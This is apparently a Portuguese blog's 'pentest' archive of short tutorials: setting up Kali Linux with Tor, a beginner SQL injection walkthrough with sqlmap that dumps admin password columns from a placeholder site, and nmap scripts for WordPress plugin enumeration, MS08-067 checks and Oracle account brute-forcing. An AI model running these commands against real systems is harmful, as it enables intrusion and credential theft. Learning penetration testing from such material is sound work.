Anúncios

Arquivo

Posts Tagged ‘pentest’

Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box


NOVOS TUTORIAIS AGORA EM http://www.infrasecurity.com.br/blog/?tag=kali-linux

 

Olá a todos

Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.

O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.

Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.

Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. Vamos lá?

1 – Criar a máquina virtual:

Vamos criar uma nova e atribuir um nome

ScreenHunter_07 Apr. 03 16.09

Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB

ScreenHunter_08 Apr. 03 16.09

Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB

ScreenHunter_11 Apr. 03 16.10

Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.

ScreenHunter_11 Apr. 03 16.11

Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site

ScreenHunter_12 Apr. 03 16.11

2 – Instalar o Kali Linux

Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”

ScreenHunter_12 Apr. 03 16.12

Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12

Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo

ScreenHunter_14 Apr. 03 16.14

Defina a senha do usuário Root

ScreenHunter_15 Apr. 03 16.15

Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar

ScreenHunter_16 Apr. 03 16.16

Nessa tela, podemos selecionar a primeira opção e avançar

ScreenHunter_18 Apr. 03 16.16

Podemos avançar, e na próxima tela selecionar “YES”

ScreenHunter_18 Apr. 03 16.17

Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.

ScreenHunter_19 Apr. 03 16.36

Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar

ScreenHunter_20 Apr. 03 16.36

Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.

ScreenHunter_20 Apr. 03 16.44

3 – Configurações iniciais.

O primeiro passo é instalar o VBOX  Additions para isso faça o seguinte abra um terminal e digite:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Aguarde a conclusão da instalação

Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”

ScreenHunter_20 Apr. 03 16.57

Quando for exibido essa tela, clique em cancelar

ScreenHunter_20 Apr. 03 17.00

Execute agora os seguintes comandos no terminal.

cp /media/cdrom0/VBoxLinuxAdditions.run /root/

chmod 755 /root/VBoxLinuxAdditions.run

./VBoxLinuxAdditions.run

Aguarde a conclusão da instalação e reinicie a VM

Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:

service postgresql start && service metasploit start

aguarde a conclusão e depois digite:

update-rc.d postgresql enable && update-rc.d metasploit enable

Para iniciar basta acessar conforme a imagem

metasploit-kali-metasploit-framework

Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:

apt-get install tor tor-geoipdb polipo vidalia

Feito isso digite

mkdir /var/run/tor

chmod 700 /var/run/tor/

Vamos configurar o polipo para acessar através do tor para isso digite

vim /etc/polipo/config

Descomente as linhas

allowedClientes 127.0.0.1

socksParentProxy = “localhost:9050”

socksParentType = socks5

salve e saia do arquivo e digite

service tor restart

service polipo restart

Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050

Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy

Para instalar o EtherApe basta digitar

apt-get install etherape

Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar

Até a próxima

Anúncios

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Tutorial: Usando nmap para listar plugins do WordPress


Bem vindos novamente

Dessa vez vou mostrar como usar a poderosa ferramenta do nmap para listar plugins instalados em uma instalação do wordpress

"nmap --script=http-wordpress-plugins --script-args
 http-wordpress-plugins.root="/blog/",
http-wordpress-plugins.search=500 <targets>"

O Resultado será uma lista com os plugins que foram localizados na instalação do wordpress.

Se gostou da dica, por favor compartilhe!

Até a próxima

Tutorial: Usando o nmap para verificação de vulnerabilidades


Olá a todos mais uma vez

Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:

nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)

"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

http://hernaneac.net/2012/11/28/explorando-vulnerabilidades-usando-metasploit-framework/ 


								

Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap


Olá a todos mais uma vez

Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.

Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.

basta fazer o seguinte:

Execute o comando: nmap –script oracle-sid-brute 192.168.0.12

O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL

ScreenHunter_06 Mar. 11 13.22

 

Feito isso basta executar o próximo comando: nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL 192.168.0.12

ScreenHunter_06 Mar. 11 13.27

 

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.

Espero que tenham gostado da dica e não se esqueça de compartilhar

Abraços

%d blogueiros gostam disto: